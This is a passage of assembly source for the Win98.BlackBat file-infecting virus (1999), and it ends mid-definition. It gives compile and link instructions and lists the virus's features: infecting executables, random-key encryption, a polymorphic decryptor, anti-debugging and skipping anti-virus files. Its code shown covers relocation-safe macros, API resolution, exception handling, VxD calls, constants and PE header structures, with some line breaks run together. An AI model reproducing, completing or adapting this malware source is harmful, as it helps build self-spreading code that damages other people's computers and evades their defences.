;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | \|/ Win98.BlackBat \|/ | |

;| | (. .) ================ (. .) | |

;| | ( | ) ( | ) | |

;| | ( v ) (c) 1999, Rohitab Batra ( v ) | |

;| | __| |__ <software@rohitab.com> __| |__ | |

;| | // \\ ICQ: 11153794 // \\ | |

;| | // ^ ^ \\ | |

;| | ((====> http://www.rohitab.com <=====)) | |

;| | | |

;| |"Blessed is he who expects nothing, for he shall not be disappointed" | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

;

;Compiling (Turbo Assembler)

; c:\>tasm32 /ml /m3 /t /w2 /s /p /dDEBUG=1 BlackBat

;

;Setting DEBUG=0 will compile the virus in Release mode. In this mode, an error

;message will be displayed, so that you don't accidently compile in release mode.

;In Release mode, the size of the Virus will be smaller, and .EXE files will be

;infected, instead of .XYZ files. In Debug mode, the file NOTEPAD.EXE, if found

;in the current directory, will be infected.

;

;Linking (Turbo Linker)

; c:\>tlink32 /x /Tpe /aa /c BlackBat,BlackBat,,IMPORT32.LIB

;

;Making Code Section Writable (EditBin from SDK, or any other utility)

; c:\>editbin /SECTION:CODE,w BlackBat.EXE

;

;***** Info About the Virus *****

;* If WIN.SYS is found in the root directory, the virus does not infect any file,

; and does not become resident.

;* File time and attributes are restored after infection

;* Encrypted with a random key

;* Doesn't infect anti-virus files, NAV, TBAV, SCAN, CLEAN, F-PROT

;* Anti-Debugging Code

;* Structured Exception Handling

;* Decryption engine is Polymorphic

;

;***** TODO *****

;1. Dont infect files with todays date

;2. Draw Random Bats on the Screen (Use CreateCompatibleBitmap & Get/Set Pixel)

;3. Doesn't infect files in directories with long file names

.386p

.model flat ,stdcall

EXTRN ExitProcess:PROC ;Any Imported Fn, so that the first

;generation copy executes without crashing

.data

DB ? ;Required for TASM, Else will Crash !!??

;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | @MESSAGE_BOX Macro | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

; Description

; -> Displays a MessageBox with the given Message. Note the caption of

; the MessageBox is the same as the Message

;

; Arguments

; -> szMessage: Message to be displayed

;

; Return Value:

; -> None

;

; Registers Destroyed

; -> ALL

;___________________________

@MESSAGE_BOX MACRO szMessage

IF DEBUG

@DELTA esi

mov eax, esi

add eax, offset szMessage

call esi + MessageBoxA, 0, eax, eax, MB_OK OR MB_ICONINFORMATION.ENDIF

ENDM

;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | @DEFINE_API Macro | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

; Description

; -> Defines an API that will be called by the Virus. The macro is expanded

; to the following, if APIName is MessageBoxA:

; szMessageBoxA DB "MessageBoxA", 0

; MessageBoxA DD ?

;

; Arguments

; -> APIName: API to be defined. MUST BE EXACTLY the same as exported by

; the DLL. e.g. MessageBoxA

;

; Return Value:

; -> None

;

; Registers Destroyed

; -> None

;

;________________________

@DEFINE_API MACRO APIName

sz&APIName DB "&APIName", 0 ;;ASCIIZ Name of API

&APIName DD ? ;;Storage space for API Address

ENDM

;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | @DELTA Macro | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

; Description

; -> Returns the delta offset in the specified register

;

; Arguments

; -> Register: register in which the value of the delta offset is copied

;

; Return Value:

; -> Register: Delta Offset

;

; Registers Destroyed

; -> Register

;

;____________________

@DELTA MACRO Register

LOCAL GetIP

call GetIP ;;This will push EIP on the stack

GetIP:

pop Register ;;get EIP of current instruction

sub Register, offset GetIP ;;Delta Offset

ENDM

;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | @OFFSET Macro | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

; Description

; -> Returns the true offset of the specified address. Unlike the offset

; keyword, which calculates the address at assembly time, this macro

; calculates the address at run-time. This is used to get the correct

; offset when the virus has been relocated. Instead of using instructions

; like "mov esi, offset szFilename", use "@OFFSET esi, szFilename"

;

; Arguments

; -> Register: register in which the offset is to be returned

; -> Expression: expression whose offset is required

;

; Return Value:

; -> Register: Correct offset of Expression

;

; Registers Destroyed.; -> Register

;

;_________________________________

@OFFSET MACRO Register, Expression

LOCAL GetIP

call GetIP ;;This will push EIP on the stack

GetIP:

pop Register ;;get EIP of current instruction

add Register, offset Expression - offset GetIP ;;True offset

ENDM

;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | @GET_API_ADDRESS Macro | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

; Description

; -> Gets the address of the API, and stores it

;

; Arguments

; -> APIName: API whose address is required

; -> ESI: Delta Offset

; -> EBX: Address of GetProcAddress(...)

; -> ECX: Base address of DLL which exports the API

;

; Return Value:

; -> None

;

; Registers Destroyed

; -> All Except ESI, EBX and ECX

;

;_____________________________

@GET_API_ADDRESS MACRO APIName

push ebx ;;Save Addr of GetProcAddress(...)

push ecx ;;Save Image Base

mov eax, esi

add eax, offset sz&APIName ;;API whose address is required

call ebx, ecx, eax ;;GetProcAddress(...)

pop ecx ;;Restore Image Base

pop ebx ;;Restore Addr of GetProcAddress(...)

mov [esi + APIName], eax ;;Save API Address

ENDM

;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | @TRY_BEGIN, @TRY_EXCEPT and @TRY_END Exception Handling Macros | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

; Description

; -> @TRY_BEGIN: This macro is used to install the exception handler. The

; code that follows this is the one that is checked for

; exceptions

; @TRY_EXCEPT: The code that follows this is executed if an exception

; occurs.

; @TRY_END: This is used to mark the end of the TRY block

;

; Example

; @TRY_BEGIN ZeroMemory

; <CODE1: Code to check for exceptions goes here>

; @TRY_CATCH ZeroMemory

; <CODE2: Gets executed if an exception occurs in CODE1>

; @TRY_END ZeroMemory

;

; Arguments

; -> Handler: Name of the exception handler. MUST BE UNIQUE throughout the

; program

;

; Return Value:

; -> None

;

; Registers Destroyed

; -> If an exception occurs, all registers are restored to the state before

; the @TRY_BEGIN block, otherwise, no registers are modified

;_______________________.@TRY_BEGIN MACRO Handler

pushad ;;Save Current State

@OFFSET esi, Handler ;;Address of New Exception Handler

push esi

push dword ptr fs:[0] ;;Save Old Exception Handler

mov dword ptr fs:[0], esp ;;Install New Handler

ENDM

@TRY_EXCEPT MACRO Handler

jmp NoException&Handler ;;No Exception Occured, so jump over

Handler:

mov esp, [esp + 8] ;;Exception Occured, Get old ESP

pop dword ptr fs:[0] ;;Restore Old Exception Handler

add esp, 4 ;;ESP value before SEH was set

popad ;;Restore Old State

ENDM

@TRY_END MACRO Handler

jmp ExceptionHandled&Handler ;;Exception was handled by @TRY_EXCEPT

NoException&Handler: ;;No Exception Occured

pop dword ptr fs:[0] ;;Restore Old Exception Handler

add esp, 32 + 4 ;;ESP value before SEH was set. 32 for pushad and ...

;;...4 for push offset Handler. (No Restore State)

ExceptionHandled&Handler: ;;Exception has been handled, or no exception occured

ENDM

;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | @CALL_INT21h Macro | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

; Description

; -> Makes an INT 21h Call in Protected Mode

;

; Arguments

; -> Service: INT 21h Service Number

;

; Return Value:

; -> None

;

; Registers Destroyed

; -> Depends on Service called

;_________________________

@CALL_INT21h MACRO Service

mov eax, Service ;;INT 21h Service

@DELTA esi

call esi + VxDCall, VWIN32_Int21Dispatch, eax, ecx

ENDM

;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | Constants | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

;Win32 Constants

PAGE_READWRITE EQU 00000004h

IMAGE_READ_WRITE_EXECUTE EQU 0E0000000h

IMAGE_SCN_MEM_SHARED EQU 10000000h ;Section is Sharable

IMAGE_FILE_DLL EQU 2000h ;File is a DLL

FILE_MAP_ALL_ACCESS EQU 000F001Fh

IMAGE_SIZEOF_NT_SIGNATURE EQU 04h ;PE00 = 0x00004550, 4 bytes

NULL EQU 0

TRUE EQU 1

FALSE EQU 0

;File Access

GENERIC_READ EQU 80000000h ;Access Mode Read Only

GENERIC_WRITE EQU 40000000h ;Access Mode Write Only

FILE_SHARE_READ EQU 00000001h ;Open Share, Deny Write

FILE_SHARE_WRITE EQU 00000002h ;Open Share, Deny Read

INVALID_HANDLE_VALUE EQU -1

ERROR_ALREADY_EXISTS EQU 000000B7h

FILE_ATTRIBUTE_NORMAL EQU 00000080h

OPEN_EXISTING EQU 3 ;Fail if not found

;Shutdown Options

EWX_FORCE EQU 4.EWX_SHUTDOWN EQU 1

;MessageBox

MB_OK EQU 00000000h

MB_YESNO EQU 00000004h

MB_ICONINFORMATION EQU 00000040h

;Virus_Constants

@BREAK EQU int 3

;MAX_RUN_TIME EQU 5*60*60*1000 ;Time we allow windows to run, 5hrs

VIRUS_SIGNATURE EQU 08121975h ;My B'day, 8 Dec 1975

RESIDENCY_CHECK_SERVICE EQU 0AD75h ;Used to check if Virus is resident

RESIDENCY_SUCCESS EQU 0812h ;Value returned if Virus is resident

;VxD Stuff

VWIN32_Int21Dispatch EQU 002A0010h

LFN_OPEN_FILE_EXTENDED EQU 716Ch

PC_WRITEABLE EQU 00020000h

PC_USER EQU 00040000h

PR_SHARED EQU 80060000h

PC_PRESENT EQU 80000000h

PC_FIXED EQU 00000008h

PD_ZEROINIT EQU 00000001h

SHARED_MEMORY EQU 80000000h ;Anything above this is shared

PageReserve EQU 00010000h

PageCommit EQU 00010001h

PAGE_SIZE EQU 4096 ;Size of a Page in Win9x

;+----------------------------------------------------------------------------+

;| +------------------------------------------------------------------------+ |

;| | | |

;| | Structures | |

;| | | |

;| +------------------------------------------------------------------------+ |

;+----------------------------------------------------------------------------+

FILETIME STRUC

FT_dwLowDateTime DD ?

FT_dwHighDateTime DD ?

FILETIME ENDS

IMAGE_DOS_HEADER STRUC ;DOS .EXE header

IDH_e_magic DW ? ;Magic number

IDH_e_cblp DW ? ;Bytes on last page of file

IDH_e_cp DW ? ;Pages in file

IDH_e_crlc DW ? ;Relocations

IDH_e_cparhdr DW ? ;Size of header in paragraphs

IDH_e_minalloc DW ? ;Minimum extra paragraphs needed

IDH_e_maxalloc DW ? ;Maximum extra paragraphs needed

IDH_e_ss DW ? ;Initial (relative) SS value

IDH_e_sp DW ? ;Initial SP value

IDH_e_csum DW ? ;Checksum

IDH_e_ip DW ? ;Initial IP value

IDH_e_cs DW ? ;Initial (relative) CS value

IDH_e_lfarlc DW ? ;File address of relocation table

IDH_e_ovno DW ? ;Overlay number

IDH_e_res DW 4 DUP (?) ;Reserved words

IDH_e_oemid DW ? ;OEM identifier (for IDH_e_oeminfo)

IDH_e_oeminfo DW ? ;OEM information; IDH_e_oemid specific

IDH_e_res2 DW 10 DUP (?) ;Reserved words

IDH_e_lfanew DD ? ;File address of new exe header

IMAGE_DOS_HEADER ENDS

IMAGE_FILE_HEADER STRUC

IFH_Machine DW ? ;System that the binary is intended to run on

IFH_NumberOfSections DW ? ;Number of sections that follow headers

IFH_TimeDateStamp DD ? ;Time/Date the file was created on

IFH_PointerToSymbolTable DD ? ;Used for debugging information

IFH_NumberOfSymbols DD ? ;Used for debugging information

IFH_SizeOfOptionalHeader DW ? ;sizof(IMAGE_OPTIONAL_HEADER)

IFH_Characteristics DW ? ;Flags used mostly for libraries

IMAGE_FILE_HEADER ENDS

IMAGE_DATA_DIRECTORY STRUC

IDD_VirtualAddress DD ?

IDD_Size DD ?

IMAGE_DATA_DIRECTORY ENDS

IMAGE_OPTIONAL_HEADER STRUC

;Standard Fields

IOH_Magic DW ? ;Mostly 0x010B.IOH_MajorLinkerVersion DB ? ;Version of the linker used

IOH_MinorLinkerVersion DB ? ;Version of the linker used

IOH_SizeOfCode DD ? ;Size of executable code

IOH_SizeOfInitializedData DD ? ;Size of Data Segment

IOH_SizeOfUninitializedData DD ? ;Size of bss Segment

IOH_AddressOfEntryPoint DD ? ;RVA of code entry point

IOH_BaseOfCode DD ? ;Offset to executable code

IOH_BaseOfData DD ? ;Offset to initialized data

;NT Additional Fields

IOH_ImageBase DD ? ;Preferred load address

IOH_SectionAlignment DD ? ;Alignment of Sections in RAM

IOH_FileAlignment DD ? ;Alignment of Sections in File

IOH_MajorOperatingSystemVersion DW ? ;OS Version required to run this image

IOH_MinorOperatingSystemVersion DW ? ;OS Version required to run this image

IOH_MajorImageVersion DW ? ;User specified version number

IOH_MinorImageVersion DW ? ;User specified version number

IOH_MajorSubsystemVersion DW ? ;Expected Subsystem version

IOH_MinorSubsystemVersion DW ? ;Expected Subsystem version

IOH_Win32VersionValue DD ? ;Mostly set to 0

IOH_SizeOfImage DD ? ;Amount of memory the image will need

IOH_SizeOfHeaders DD ? ;Size of DOS hdr, PE hdr and Object table

IOH_CheckSum DD ? ;Checksum (Used by NT to check drivers)

IOH_Subsystem DW ? ;Subsystem required to run this image

IOH_DllCharacteristics DW ? ;To decide when to call DLL's entry point

IOH_SizeOfStackReserve DD ? ;Size of Reserved Stack

IOH_SizeOfStackCommit DD ? ;Size of initially commited stack

IOH_SizeOfHeapReserve DD ? ;Size of local heap to reserve

IOH_SizeOfHeapCommit DD ? ;Amount to commit in local heap

IOH_LoaderFlags DD ? ;Not generally used

IOH_NumberOfRvaAndSizes DD ? ;Number of valid entries in DataDirectory

IOH_DataDirectory IMAGE_DATA_DIRECTORY 16 DUP (?)

IMAGE_OPTIONAL_HEADER ENDS

IMAGE_EXPORT_DIRECTORY STRUC

IED_Characteristics DD ? ;Currently set to 0

IED_TimeDateStamp DD ? ;Time/Date the export data was created

IED_MajorVersion DW ? ;User settable

IED_MinorVersion DW ?

IED_Name DD ? ;RVA of DLL ASCIIZ name

IED_Base DD ? ;First valid exported ordinal

IED_NumberOfFu